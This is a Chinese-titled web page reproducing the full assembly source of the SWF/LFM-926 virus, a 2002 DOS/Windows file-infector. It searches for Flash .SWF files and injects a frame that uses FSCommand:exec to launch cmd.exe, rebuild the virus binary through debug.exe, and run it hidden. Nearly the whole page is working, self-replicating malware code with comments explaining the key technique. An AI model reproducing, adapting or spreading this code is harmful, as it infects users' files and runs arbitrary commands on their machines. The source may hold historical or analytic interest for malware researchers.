国外的第一只flash病毒的源代码
SWF/LFM-926 Virus:
; ------------------
; Description: WinNT/XP Virus dropper for Flash .SWF files!
; Masm Version 6.11: ML.EXE SWF.ASM
; Virus Size: 926 bytes
; Infection Size: 3247 bytes.
; Last Edit: 01/08/2002
; --------------------------------- Begin Source Code ---------------
.286
.model tiny
.code
org 100h
Entry: jmp Start
VIR_SIZE equ Virus_End-Entry
DTA db 128 dup(0) ; Offset DTA+30 = filename
HANDLE dw ? ; Handle to host file
PTR1 dd 0 ; Segment address of the created memory block
PATH db "*.SWF",0 ; File mask
BINARY db "v.com",0 ; Binary code
HEX db "0123456789ABCDEF" ; Binary to hex
; Flash header block.
; -------------------
SIGN_FW dw ? ; SWF file format
SIGN_S db ?
VERSION_NUM db ?
FILE_LENGTH dw ?
dw ?
STATIC_HDR_SIZE equ $-SIGN_FW
RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isn't static. ;(
RECT_BUF_SIZE equ $-RECT_BUF
HDR_SIZE dw ? ; Holds the true header size!
; Start of Viral Frame 0.
; -----------------------
DROP_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes!
TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG]
dw 0
db 083h ; ActionGetUrl Tag
ACTION_LENGTH dw 0 ; (DROP_BEGIN_SIZE-9)+(SUM OF DROP_MIDDLE)+(DROP_END_SIZE)
db 'FSCommand:exec'
db 000h
db 'cmd.exe'
db 009h ; chr(9) is Flash code for a space character.
db '/c'
db 009h
db 'echo'
db 009h
db 'Loading.Flash.Movie...'
db '&'
db '(echo'
db 009h
db 'n'
db 009h
db 'v.com&echo'
db 009h
db 'a'
db 009h
db '100&'
DROP_BEGIN_SIZE equ $-DROP_BEGIN
DROP_MIDDLE db 'echo'
db 009h
db 'db'
db 009h
db 71 dup(',') ; db XX,...,XX where XX's are viral hex codes.
db '&'
DROP_MIDDLE_SIZE equ $-DROP_MIDDLE
DROP_END db '&echo.&echo'
db 009h
db 'rcx&echo'
db 009h
db '39E' ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes.
db '&echo'
db 009h
db 'w&echo'
db 009h
db 'q)|debug.exe>nul&start'
db 009h
db '/b'
db 009h
db 'v.com'
db 000h ; StringEnd Tag
DROP_END_SIZE equ $-DROP_END
; End of Viral Frame 0.
; ---------------------
END_TAG db 001h ; Action code 0x01 = tagshowframe Tag
Start:
mov ax,(VIR_SIZE+0fh)
shr ax,4
shl ax,1
mov bx,ax ; Allocate (VirusSize*2)
mov ah,4ah
int 21h ; Resize block
jc ExProg
mov dx,offset DTA ; Set DTA operation
mov ah,1ah
int 21h
mov cx,07h
mov dx,offset PATH
mov ah,4eh ; FindFirst
int 21h
jc ExProg
jmp Infect
Cycle:
mov dx,offset PATH
mov ah,4fh ; FindNext
int 21h
jc ExProg
jmp Infect
ExProg:
mov ax,4301h ; Hide v.com
mov cx,02h
mov dx,offset BINARY
int 21h
mov ax,4c00h ; End program
int 21h
Infect:
mov byte ptr DTA[30+12],'$'
mov dx,offset (DTA+30)
mov ax,3d02h ; Open host file
int 21h
jc ExProg
mov [HANDLE],ax ; Save file handle
mov ax,3f00h ; Read file Header
mov dx,offset SIGN_FW
mov bx,[HANDLE]
mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE)
int 21h
jc ExProg
cmp word ptr SIGN_FW,'WF' ; Check for a valid Flash SWF file.
jne Cycle ; Try another file ...
cmp byte ptr SIGN_S,'S'
jne Cycle
cmp byte ptr VERSION_NUM,099h ; Already infected?
je Cycle
mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag.
xor di,di ; Seems to always exist directly after the header.
next: cmp byte ptr RECT_BUF[di],043h
jne not_found
cmp byte ptr RECT_BUF[di+1],002h
jne not_found
jmp found
not_found:
inc di
loop next
jmp Cycle
found:
mov word ptr HDR_SIZE,STATIC_HDR_SIZE
add word ptr HDR_SIZE,di ; Compute the header size
mov ax,4200h ; Reset file ptr right after Flash header
xor cx,cx
mov dx,[HDR_SIZE]
int 21h
jc ExProg
push bx
mov ax,word ptr FILE_LENGTH
add ax,15
shr ax,4
mov bx,ax
mov ah,48h ; Allocate memory for target host file
int 21h
pop bx
jc ExProg
mov word ptr PTR1[2],ax ; Save pointer to allocated block
mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ah,3fh ; Read host file into memory block
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg
mov ax,4200h ; Reset file ptr to the middle code section
xor cx,cx
mov dx,[HDR_SIZE]
add dx,DROP_BEGIN_SIZE
int 21h
jc ExProg
;
; The following code is a key technique. It simply converts the
; virus from binary to hex characters and then inserts them into the host
; using a standard format that DEBUG.EXE expects! Flash only really
; allows plain text, so this satisfies that condition.
;
mov word ptr ACTION_LENGTH,(DROP_BEGIN_SIZE-9+DROP_END_SIZE)
push bx
mov cx,VIR_SIZE
xor si,si
xor di,di
ToHex:
mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber
mov al,byte ptr Entry[si]
mov ah,al
and al,00001111y
xlat
mov DROP_MIDDLE[STATIC_HDR_SIZE+di+1],al
shr ax,12
xlat
mov DROP_MIDDLE[STATIC_HDR_SIZE+di],al
inc si
inc di
inc di
inc di
mov ax,si
mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line.
div bl
or ah,ah
jnz cont
push cx
xor di,di
add word ptr ACTION_LENGTH,DROP_MIDDLE_SIZE
mov bx,[HANDLE] ; Write hex dump entry XX,...,XX
mov dx,offset DROP_MIDDLE
mov cx,DROP_MIDDLE_SIZE
mov ax,4000h
int 21h
jc ExProg
pop cx
cont:
loop ToHex
pop bx
or di,di
jz no_remainder
mov dx,offset DROP_MIDDLE
mov cx,di
add cx,7 ; STATIC_HDR_SIZE-1
add word ptr ACTION_LENGTH,cx
mov ax,4000h ; Write remainder hex dump entry XX,...,XX
int 21h
jc ExProg
no_remainder:
mov dx,offset DROP_END
mov cx,DROP_END_SIZE+1
mov ax,4000h ; Write end code and end of frame tag(01) into host
int 21h
jc ExProg
mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ax,4000h ; Write host code directly after viral code.
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg
; Patch the header with new viral values.
mov cx,word ptr ACTION_LENGTH
add cx,4
mov word ptr TAG_LENGTH,cx
add cx,6
add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6)
; Set infection marker
mov byte ptr VERSION_NUM,099h
mov di,[HDR_SIZE]
inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1
mov ax,4200h ; Re-wind to start of file
xor cx,cx
xor dx,dx
int 21h
jc ExProg
mov dx,offset SIGN_FW
mov cx,[HDR_SIZE]
mov ax,4000h ; Write updated viral header
int 21h
jc ExProg
mov dx,offset DROP_BEGIN
mov cx,DROP_BEGIN_SIZE
mov ax,4000h ; Write begin code into host
int 21h
jc ExProg
mov ah,49h ; Free memory block
mov es,word ptr PTR1[2]
int 21h
jc ExProg
mov ax,3e00h ; Close file
int 21h
jc ExProg
jmp Cycle ; DONE! Try to infect another.
Virus_End:
end Entry
; --------------------------------- End Source Code ------------------
评论